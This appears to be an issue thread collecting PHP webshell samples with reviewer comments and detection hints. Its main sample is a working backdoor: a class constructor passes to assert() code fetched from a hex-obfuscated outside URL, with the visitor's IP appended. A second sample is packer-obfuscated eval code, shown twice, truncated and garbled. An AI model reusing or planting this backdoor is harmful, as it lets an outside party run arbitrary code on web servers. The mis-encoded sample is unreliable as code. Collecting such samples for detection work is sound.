// (deprecated in 7.2, removed in 8.0), so confirm the runtime version when triaging.
// Detection: code on the same line as a docblock's closing `*/`, and variable-function
// calls whose argument comes from $_SERVER['HTTP_*'] or $_COOKIE.
function getOutput()
{
    // NOTE(review): file-scope function whose body uses $this; no enclosing class is visible
    // in this listing, so it reads as filler copied from a class (presumably never called).
    if (!$this->output)
    {
        // In 4.0, this will convert to throwing an exception and you will expected to
        // initialize this in the constructor. Until then set a default.
        $default = new Joomla\Application\Cli\Output\Xml;
        $this->setOutput($default);
    }

    return $this->output;
}

/**
 * Method to run the application routines.  Most likely you will want to instantiate a controller
 * and execute it, or perform some sort of task directly.
 *
 * @return  void
 *
 * @codeCoverageIgnore
 * @since   11.3
 */
function doExecute()
{
    // NOTE(review): empty body. Together with the other file-scope functions in this listing
    // it only adds familiar-looking framework text around the statements hidden between
    // the docblocks.

    // Your application routines go here.
}
Xyntax commented 5 years ago

利用构造函数隐藏调用起点

<?php
/**
 * Sample: the dangerous call is placed in a constructor, so it runs on `new Check_safe()`.
 *
 * The constructor passes the result of __str() to assert(). __str() fetches the URL
 * returned by __url(), and __url() rebuilds that URL from three hex strings with
 * pack("H*", ...) and appends the client address.
 *
 * NOTE(review): string arguments to assert() were evaluated as code only on older PHP
 * (deprecated in 7.2, removed in 8.0); confirm the runtime version when triaging.
 * Detection: assert()/eval() fed by file_get_contents(), and pack("H*", ...) or similar
 * decoders producing a URL, together with an outbound request made while the page loads.
 */
class Check_safe
{
        function __construct()
        {
                // Unused: nothing else in this class reads $password.
                $password  = '127538';
                // Sink: remote content is handed to assert(); `@` hides any warning.
                @assert($this->__str());
        }

        // Returns the body fetched from the URL built by __url(), or false on failure
        // (the warning is suppressed by `@`).
        public function __str(){
                return @file_get_contents($this->__url());
        }

        // Builds the fetch URL. The three hex strings decode to an http:// URL ending in the
        // query parameter `ips=`, to which $_SERVER['REMOTE_ADDR'] is appended, so the
        // host name never appears as readable text in the file.
        public function __url(){
                $ips = $_SERVER['REMOTE_ADDR'];
                $arr = array('687474703a2f2f7777772e3430','307361792e636f6d2f636f6465','2e7068703f6970733d');
                return pack("H*",$arr[0].$arr[1].$arr[2]).$ips;
        }
}
// The only statement at file scope: creating the object runs the constructor, which does
// the rest. A review limited to file-scope calls sees nothing but an object creation here.
new Check_safe();
Xyntax commented 5 years ago

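加密工具 (encryption tool: output of a packer-style encoder. In the sample below, identifiers use high-byte characters and function names are assembled character by character from a `base64_decode()` result before being passed to `eval()`. The sample is truncated and partly mis-encoded on this page, so it cannot be used as an exact signature source.)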

<?php /* Powered by www.qibosoft.com */$å603<84><9f><9e><8f><9c>³«»¢ô<81>=__FILE__;$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾=base64_decode("Z­mc2cÄ2JlaHBy<93>YTRjb190bmQ=s");$ll1ll11111l111lll1=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{4}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{3}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11111l111lll1.=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{2}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{10}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{13}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll1ll11111l111lll1.=$ll1ll11111l111lll1{3}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{11}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$ll1ll11111l111lll1{7}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11lll1l1l1=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{7}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{15};$ll1ll11lll1l111=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{1}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{14};$ll1ll11lll1l111=$ll1ll11lll1l111.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{3};$ll1l111lll1l111=$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{8}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll11l111lllllll11111l="rb";$ll11l111lllllll11111ll1="exp";$ll11l111lllllll11111ll1.="lode";$l1111llllllll11111l;eval($ll1ll11111l111lll1
Xyntax commented 5 years ago
<?php /* Powered by www.qibosoft.com */$å603<84><9f><9e><8f>
<9c>³«»¢ô<81>=__FILE__;$<86>971<85><8b><9e>¾¶ìþë<8d>ÚÆ<84>®¾=base64_decode("Z­
mc2cÄ2JlaHBy<93>YTRjb190bmQ=s");$ll1ll11111l111lll1=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{4}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{3}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11111l111lll1.=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{2}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{10}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{13}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll1ll11111l111lll1.=$ll1ll11111l111lll1{3}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{11}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$ll1ll11111l111lll1{7}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5};$ll1ll11lll1l1l1=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{12}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{7}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{15};$ll1ll11lll1l111=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{1}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{14};$ll1ll11lll1l111=$ll1ll11lll1l111.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{3};$ll1l111lll1l111=$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{0}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{8}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{5}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{9}.$<86>971<85><8b>
<9e>¾¶ìþë<8d>ÚÆ<84>®¾{16};$ll11l111lllllll11111l="rb";$ll11l111lllllll11111ll1="exp";$ll11l111lllllll11111ll1.
="lode";$l1111llllllll11111l;eval($ll1ll11111l111lll1('J<91><81>P